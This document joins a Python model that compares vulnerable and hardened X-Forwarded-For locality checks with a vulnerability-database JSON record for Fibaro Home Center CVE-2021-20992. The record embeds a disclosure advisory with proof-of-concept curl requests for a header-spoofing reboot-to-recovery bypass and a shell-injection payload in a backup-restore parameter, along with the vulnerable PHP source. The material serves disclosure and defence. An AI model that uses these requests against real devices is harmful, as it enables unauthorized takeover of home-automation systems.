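    if environ.get("HTTP_X_FORWARDED_FOR"):
        return False
    return True


def reboot_endpoint(environ: dict, authorized: bool, check=is_local_request_hardened) -> str:
    """Model of reboot.php's gate: local OR authorized, otherwise 401."""
    if not check(environ) and not authorized:
        return "401 Unauthorized"
    return "200 rebooting"


# Constructed requests, as lighttpd on port 8000 would see them.
SPOOFED_LAN = {"REMOTE_ADDR": "192.168.1.50", "HTTP_X_FORWARDED_FOR": "127.0.0.1"}
PLAIN_LAN = {"REMOTE_ADDR": "192.168.1.50"}
LOCAL_PROCESS = {"REMOTE_ADDR": "127.0.0.1"}
VIA_NGINX = {"REMOTE_ADDR": "127.0.0.1", "HTTP_X_FORWARDED_FOR": "192.168.1.50"}
VIA_NGINX_SPOOFED = {"REMOTE_ADDR": "127.0.0.1",
                     "HTTP_X_FORWARDED_FOR": "127.0.0.1, 192.168.1.50"}


def compare() -> dict:
    """(vulnerable, hardened) verdict for each constructed request."""
    cases = {"spoofed_lan": SPOOFED_LAN, "plain_lan": PLAIN_LAN,
             "local_process": LOCAL_PROCESS, "via_nginx": VIA_NGINX,
             "via_nginx_spoofed": VIA_NGINX_SPOOFED}
    return {name: (is_local_request_vulnerable(env), is_local_request_hardened(env))
            for name, env in cases.items()}


if __name__ == "__main__":
    for name, (vuln, hard) in compare().items():
        print(f"{name:18} vulnerable={vuln!s:5} hardened={hard}")
```

    The spoofed_lan case is exactly the advisory's curl request with
    `X-Forwarded-For: 127.0.0.1` sent straight to port 8000: the vulnerable
    check grants local privilege, the hardened one does not. The via_nginx
    cases show why the original bypass needed direct access to 8000: nginx
    appends the real client address, so the header no longer equals a bare
    loopback address. The hardened check is still only defence in depth; the
    real fix is to bind lighttpd to 127.0.0.1 so port 8000 is not reachable
    from the LAN at all.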


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0490",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "*"
          },
          {
            "model": "home center 2",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "*"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20992",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-20992",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-20992",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "info@cert.vde.com",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2021-20992",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20992",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20992",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1332",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20992",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Fibaro Home Center 2 and Lite devices in all versions provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens and passwords. IoT Inspector Research Lab Advisory IOT-20210408-0\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n             title: Multiple vulnerabilities \n\n    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2\n\n                    https://www.fibaro.com/\n\nvulnerable version: 4.600 and older\n\n     fixed version: 4.610\n\n        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n\n                    CVE-2021-20992\n\n            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    9.8 (critical)\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n          reported: 2020-11-18\n\n       publication: 2021-04-08\n\n                by: Marton Illes, IoT Inspector Research Lab\n\n                    https://www.iot-inspector.com/\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO\u0027s headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. 
This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface. \n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks. \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n\n(CVE-2021-20990)\n\nAn internal management service is accessible on port 8000 and some API \n\nendpoints could be accessed without authentication to trigger a shutdown, a \n\nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n\nupload firmware without authentication. (Potentially an earlier version with\n\n\nknown remote command execution vulnerability, see #3)\n\n \n\n3) Authenticated remote command execution (versions before 4.550) \n\n(CVE-2021-20991)\n\nAn authenticated user can run commands as root user using a command\ninjection \n\nvulnerability. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device. \n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate a SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n\u003csnip\u003e\n\nDAEMON=/usr/bin/ssh\n\n \n\n.... \n\n \n\ncase \"$1\" in\n\n  start)\n\n    \n\n                ..... 
\n\n \n\n    # get IP\n\n    local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}\u0026HW_Key=${HW_Key}\"\n\n    local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n    # get PORT\n\n    local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}\u0026HW_Key=${HW_Key}\"\n\n    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n                .... \n\n                \n\n    start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n\u003c/snip\u003e\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice. 
\n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n\u003csnip\u003e\n\nfunction handleResponse(response)\n\n  responseJson = json.decode(response.data)\n\n  print(json.encode(responseJson))\n\n \n\n  local autoSSHCommand = \u0027ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \u0027  .. responseJson.private_ip..  \u0027:\u0027\n.. responseJson.port .. \u0027:localhost:22 remote2@\u0027 .. responseJson.ip\n\n  os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n  remoteUrl=\u0027https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=\u0027\n.. serialNumber .. \u0027\u0026HW_Key=\u0027 .. HWKey\n\n  print(remoteUrl)\n\n \n\n  http = net.HTTPClient({timeout = 5000})\n\n \n\n  http:request(remoteUrl, {\n\n    options = {\n\n      method = \u0027GET\u0027\n\n    },\n\n    success = function(response)\n\n      handleResponse(response)\n\n    end,\n\n    error = function(error)\n\n      print(error)\n\n    end\n\n  })\n\nend\n\n \n\ngetSupportData()\n\n\u003c/snip\u003e\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection. 
\n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n\u003csnip\u003e\n\n                                proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n                                \n\n        location ~* \\.php$ {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n \n\n        location ~* \\.php\\?.* {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n\u003c/snip\u003e\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork. \n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n\u003csnip\u003e\n\nfunction isLocalRequest()\n\n{\n\n    $ipAddress = \"\";\n\n    if(!empty($_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027])) \n\n        $ipAddress = $_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027];\n\n    else\n\n        $ipAddress = $_SERVER[\u0027REMOTE_ADDR\u0027];\n\n \n\n    $whitelist = array( \u0027127.0.0.1\u0027, \u0027::1\u0027 );\n\n    if(in_array($ipAddress, $whitelist))\n\n        return true;\n\n \n\n    return false;\n\n}\n\n\u003c/snip\u003e\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well. 
\n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n\u003csnip\u003e\n\n\u003c?php\n\n    require_once(\"../../authorize.php\");\n\n \n\n    if (!isLocalRequest() \u0026\u0026 !isAuthorized())\n\n    {\n\n       sendUnauthorized();\n\n    }\n\n    else\n\n    {\n\n        exec(\"systemShutdown\");\n\n    }\n\n?\u003e\n\n\u003c/snip\u003e\n\n \n\n./var/www/services/system/reboot.php\n\n\u003csnip\u003e\n\n \n\nfunction authorize() \n\n{\n\n    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n    if (!isLocalRequest() \u0026\u0026 !authorize())\n\n    {\n\n       sendUnauthorized();\n\n       return;\n\n    }\n\n \n\n    $params = tryDecodeJson($text);\n\n    if(!is_null($params) \u0026\u0026 isset($params-\u003erecovery) \u0026\u0026 $params-\u003erecovery\n=== true)\n\n        exec(\"rebootToRecovery\");\n\n    else\n\n        exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents(\u0027php://input\u0027);\n\n$requestMethod = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\n \n\nif ($requestMethod == \"POST\") \n\n    handlePOST($requestBody);\n\nelse \n\n    setStatusMethodNotAllowed();\n\n \n\n\u003c/snip\u003e\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H \u0027X-Forwarded-For: 127.0.0.1\u0027 -H \u0027Content-Type: application/json\u0027 -d\n\u0027{\"recovery\":true}\u0027  http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication. 
\n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup \u0026 restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n\u003csnip\u003e\n\nfunction restoreBackup($params)\n\n{\n\n    if (getNumberOfInstances(\u0027{screen} SCREEN -dmS RESTORE\u0027) \u003e 0)\n\n    {\n\n        setStatusTooManyRequests();\n\n        return;\n\n    }\n\n \n\n    $type = $params-\u003etype;\n\n    $id = $params-\u003eid;\n\n    $version = $params-\u003eversion;\n\n \n\n    if (is_null($id) || !is_numeric($id) || $id \u003c 1 ) \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n    if ($type == \"local\" \u0026\u0026 $hcVersion == \"HC2\" || $type == \"remote\") \n\n    {\n\n        $version ?\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id . \u0027 \u0027 . $version) :\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. 
\n$id);\n\n    }\n\n    else \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    setStatusAccepted();\n\n}\n\n\u003c/snip\u003e\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat \u003e /tmp/exploit \u003c\u003c- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -H \u0027content-type:\napplication/json\u0027 -d@/tmp/exploit  http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n\u003csnip\u003e\n\n    $version = escapeshellarg($params-\u003eversion);\n\n\u003c/snip\u003e\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT     STATE SERVICE\n\n22/tcp   open  ssh\n\n80/tcp   open  http\n\n8000/tcp open  http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3. \n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device. 
\n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. 
\n\n \n\nYou can find our responsible disclosure policy here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20992",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "id": "VAR-202104-0490",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.427000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Fibaro Home Center 2 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147743"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-319",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/319.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "date": "2021-04-19T14:15:11.883000",
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "date": "2021-04-25T00:00:00",
            "db": "CNNVD",
